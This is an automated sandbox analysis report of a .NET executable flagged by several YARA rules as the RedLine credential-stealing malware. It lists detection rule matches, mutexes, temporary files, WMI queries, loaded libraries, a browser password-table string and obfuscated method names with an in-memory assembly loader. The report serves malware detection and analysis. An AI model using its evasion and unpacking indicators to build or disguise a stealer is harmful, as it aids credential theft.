Source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: ljMiHZ8MwZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, oxFBU42wJTr2UTVcBS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, oxFBU42wJTr2UTVcBS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, oxFBU42wJTr2UTVcBS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qyyPq296Qkh0EGin1j.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/47@1/1

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ljMiHZ8MwZ.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Mutant created: \Sessions\1\BaseNamedObjects\KnHlURODBTv
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5D0B.tmp

Jump to behavior

Source: ljMiHZ8MwZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ljMiHZ8MwZ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp5D2E.tmp.2.dr, tmp5D3E.tmp.2.dr, tmp5D2C.tmp.2.dr, tmp5D0B.tmp.2.dr, tmp5D2D.tmp.2.dr, tmp5D1B.tmp.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ljMiHZ8MwZ.exe	Virustotal: Detection: 34%
Source: ljMiHZ8MwZ.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\ljMiHZ8MwZ.exe "C:\Users\user\Desktop\ljMiHZ8MwZ.exe"
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process created: C:\Users\user\Desktop\ljMiHZ8MwZ.exe "C:\Users\user\Desktop\ljMiHZ8MwZ.exe"
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process created: C:\Users\user\Desktop\ljMiHZ8MwZ.exe "C:\Users\user\Desktop\ljMiHZ8MwZ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ljMiHZ8MwZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ljMiHZ8MwZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: WINLOA~1.PDBwinload_prod.pdbF@ source: ljMiHZ8MwZ.exe, 00000002.00000002.1875228155.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qyyPq296Qkh0EGin1j.cs	.Net Code: cirREBtbBH System.Reflection.Assembly.Load(byte[])
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, qyyPq296Qkh0EGin1j.cs	.Net Code: cirREBtbBH System.Reflection.Assembly.Load(byte[])
Source: 0.2.ljMiHZ8MwZ.exe.42d2a58.0.raw.unpack, qyyPq296Qkh0EGin1j.cs	.Net Code: cirREBtbBH System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Code function: 0_2_05D45AE2 push esp; retf

0_2_05D45AE9

Source: ljMiHZ8MwZ.exe

Static PE information: section name: .text entropy: 7.678717951671746

Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, fveyHcscgRsunRk5tw.cs	High entropy of concatenated method names: 'OdIHVklGB7', 'A0hHUGFMQ8', 'di7HHgDVU3', 'WPhHuZdIF0', 'jecHQtuy81', 'S8EHnCMkGg', 'Dispose', 'LaqemtE7ag', 'lEmeWMFu5u', 'wvpeg8N1fq'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, h3TbBgPKWJM3k3GmXI.cs	High entropy of concatenated method names: 'Bv0Hj9P4vN', 'PoCHI7bXh9', 'tP0HorBdxk', 'IZFHkKqDSB', 'UFwH4dBZ5o', 'ogmHfMfU7I', 'tblHCCM6eU', 'nwbHBP7FxE', 'SsyHNnx5Wn', 'DvtHYPC36J'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, oxFBU42wJTr2UTVcBS.cs	High entropy of concatenated method names: 'gdZWZTamEN', 'cYxWGfDJ6P', 'rqsWvqG85K', 'Q24WMioCkT', 'rNOW5G1gr6', 'jSLWrW6foE', 'SR2WsFrbym', 'hWXW8tYt4w', 'JI0WPWFWqv', 'lU8Wh0W6ir'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qGWQwo3dZPjlkLfaXEb.cs	High entropy of concatenated method names: 'YktuhfmIYi', 'LD9uzApOq9', 'e62bXRuxUF', 'wm5bICyysQdvmS0Q4XK', 'z8lOOUyLLHyT7DMV13X', 'bHiac7yXndI6kdjUemP', 'hl7PP7yYada2wJVpExC'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, UFuoQeCdlpIA3uNJJl.cs	High entropy of concatenated method names: 'vDVamV7Xnr', 'vJOag5ovPb', 'JaoapdFwQR', 'D7QphduMc9', 'I2ipzGUjRU', 'gt4aXushGK', 'gITa3pQxCc', 'UwGaKQRs84', 'acQadBXrkB', 'SoUaRkv0wZ'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, fRMpebh3HnJSGfKfL5.cs	High entropy of concatenated method names: 'ALF7gxHoIM', 'aPJ7DUGyTh', 'zHi7pDRhFN', 'KDK7aqetw2', 'dLQ7Hk0QyX', 'Sg079EB4Xj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qBd4H5tgmR5ZnW4Vei.cs	High entropy of concatenated method names: 'SutDAJlYvu', 'ROiDTD7a6p', 'mTmgouYxdA', 'L8LgkWOIJ0', 'W3Ag4urpy0', 'DrNgfaG3pJ', 'YTHgCpg8YQ', 'DeXgBstkRy', 'pSJgNqq9kK', 'CsugYjNTct'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, EuOpUCriLBxCLqaAMU.cs	High entropy of concatenated method names: 'vOfU8JiVtS', 'kejUh5P7hq', 'SsmeXP6x2t', 'QJie3NWrSU', 'GF1USGkmOm', 'WiyUJ3iYo2', 'WsjULLBDQN', 'kxpUZuaE8e', 'h6cUGQhmVq', 'hBvUvt1s7r'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, CmxdKqWHRvJdY9P2C6.cs	High entropy of concatenated method names: 'Dispose', 'dsu3PnRk5t', 'rm3KI9Ogld', 'Qc9iynxKxx', 'xPb3h5Y0G1', 'lEh3zmDCB4', 'ProcessDialogKey', 'BLgKX3TbBg', 'bWJK3M3k3G', 'fXIKKmRMpe'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, KxSlmh3RWIExw3kFaGD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'z08bHsNTZt', 'ecEb7Gibds', 'qkVbu8Vsq1', 'yOpbbc5rbG', 'kJ0bQvpgRT', 'eCebiuG1RS', 'ywtbnw3DD6'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, xGWxxQzs6QMPuKRFe2.cs	High entropy of concatenated method names: 'Aa47OyMdV0', 'LFy72Jn1d0', 'K3o7xmxHL9', 'n0x7jyVL10', 'TvY7ICrcs6', 'TgC7kWqNRO', 'DvN74adREW', 'pbF7nn2tWa', 'QTQ7wEuCWn', 'VlA7FUj0xI'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, biOSFH33IeY62QRJA5u.cs	High entropy of concatenated method names: 'QlJ7hp51tX', 'MG57zf7uE8', 'JcnuXUOOQD', 'fA8u3qOCi4', 'FSLuKS6IhR', 'rOoudh4wZt', 'ITfuRayqui', 'inZulFFGL1', 'jZNumyFrVi', 'b7UuWxWnYF'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, G5HkYS3K1F7W131Parx.cs	High entropy of concatenated method names: 'ToString', 'VWUu29M9nH', 'MVbuxhGMUF', 'iJ8utawXTD', 'JRLujRBLdW', 'qDkuIy5ybl', 'jxiuo8mK8k', 'wY9ukYXNFp', 'P7KdVQyQjg5MX7td4nQ', 'tHGhUAyF7lc1PN7P3jK'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qYwR0TMDtDIN8pqpVU.cs	High entropy of concatenated method names: 'BD7U66QRgG', 'nAxUqfollF', 'ToString', 'wlwUm64e64', 'mhHUWUVW0m', 'zHcUgC0Lhx', 'rNTUDVxSBj', 'FU6UpWpA6U', 'FBeUas9IZb', 'a0oU99NcCK'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, LXtXutRj3L0weLOGZY.cs	High entropy of concatenated method names: 'F8c3axFBU4', 'xJT39r2UTV', 'eGN364ahiv', 'us03qOUBd4', 'g4V3VeivHo', 'mSo31uYakG', 'yxG1MyehurFOIaCjcr', 'QK6o1mHaIraxp3BFvG', 'Fv933fjTu5', 'jX53dwsoay'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, UeK7EHGFSG5neVbdSw.cs	High entropy of concatenated method names: 'nbNVs063IM', 'XPBV8TMQUC', 'dUEVPT2A0j', 'ht3VhZ13r1', 'p525tGkInunKOMT2f6S', 'QHQbV4kYEaXYvcxiYYR', 'bClmjgknsESuy7o594T'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, mKU4ufKcuQsUByve7r.cs	High entropy of concatenated method names: 'VItECekKP', 'IqC0W8elS', 'UpHOa6EJf', 'P4NTtkGB1', 'IY6xDZZ3I', 'fIKtwLipq', 'w5Etjeu7NULWdSieki', 'RvXf0NPgYG12aGGDNY', 'f4ae92gPt', 'JYY7gfda3'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, HdUXMlxGN4ahivbs0O.cs	High entropy of concatenated method names: 'uhSg0nX4tU', 'uhdgOdZPyk', 'xR2g2QEytr', 'YUtgxoWcVD', 'L7PgVvKeVs', 'XN5g1erWgM', 'CFpgUHOUVG', 'y7yge176mP', 'DaMgHipFIa', 'XNXg73fxNs'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, YBBGBdLdRgRLbm4owH.cs	High entropy of concatenated method names: 'xJnc2OJVPr', 'HGMcxjHCrF', 'FKEcjp1Lfs', 'bDucIDDW7G', 'lDxckPRHCp', 'Kfvc47gPNf', 'GwDcC0Wj3c', 'bekcBNIuZy', 'a3ocYmRbPR', 'tpEcSZ6mhr'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, SHo6SojuYakG6IgwZL.cs	High entropy of concatenated method names: 'KXOpl6bCye', 'd9ypW5gmQX', 'gyWpDflitr', 'qZLpap8reC', 'Xxcp9K9coy', 'kBwD5BnHfP', 'rftDrFd5BB', 'hhTDsv73gI', 'sEtD8aUT80', 'NJ7DPla2TT'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, qyyPq296Qkh0EGin1j.cs	High entropy of concatenated method names: 'euPdl7mcaD', 'GFpdm8cMPX', 'ARXdWkGCMc', 'J1xdglQem5', 'o1rdDC7DXT', 'GfCdpo0y6C', 'TqadaJe7Qc', 'C0ad9cnMHI', 'aXfdy2Hn7t', 'AVvd6CwsdW'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, whT9VAvWrWdOTj3EWO.cs	High entropy of concatenated method names: 'ToString', 'HV41S9wE0x', 'zBN1IqjnDN', 'aBO1otoC4M', 'Plr1ko0y1i', 'IZB14hmjai', 'j2w1fjqtJA', 'M9a1CtUvUE', 'BbA1BLpqst', 'ogf1Nkre7A'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, Ko28UW3XlevF8QFhQ37.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D8F7SHgxen', 'lke7Jp3es7', 'U1G7LW9wfa', 'JxR7Z5LvDG', 'Eqe7G2j9V1', 'wMK7vU1pZh', 'Mlo7MJmBYk'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, c0npjGZVC8QoekSSiE.cs	High entropy of concatenated method names: 'oZ7VYCnT0c', 'JNAVJ2y6N2', 'BTqVZ9vKHe', 'rroVGn95O6', 'DtiVIgGoL5', 'l39VoG98lM', 'fLoVkVeIkQ', 'WcPV4I0S9L', 'mTyVffQVVl', 'muOVCunoqX'
Source: 0.2.ljMiHZ8MwZ.exe.7910000.4.raw.unpack, bD37EoNqtrph9p0XKi.cs	High entropy of concatenated method names: 'ELqaw0Q2pj', 'sKiaFEIPPu', 'ahvaEBSRyN', 'YSVa0Z019T', 'CtZaAwGRaF', 'hXiaOM8Ifk', 'cQaaTGXP8U', 'z1Ha2oD9Jw', 'BdPax0uMoO', 'yk7at26fk1'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, fveyHcscgRsunRk5tw.cs	High entropy of concatenated method names: 'OdIHVklGB7', 'A0hHUGFMQ8', 'di7HHgDVU3', 'WPhHuZdIF0', 'jecHQtuy81', 'S8EHnCMkGg', 'Dispose', 'LaqemtE7ag', 'lEmeWMFu5u', 'wvpeg8N1fq'
Source: 0.2.ljMiHZ8MwZ.exe.432ec78.3.raw.unpack, h3TbBgPKWJM3k3GmXI.cs	High entropy of concatenated method names: 'Bv0Hj9P4vN', 'PoCHI7bXh9', 'tP0HorBdxk', 'IZFHkKqDSB', 'UFwH4dBZ5o', 'ogmHfMfU7I', 'tblHCCM6eU', 'nwbHBP7FxE', 'SsyHNnx5Wn', 'DvtHYPC36J'
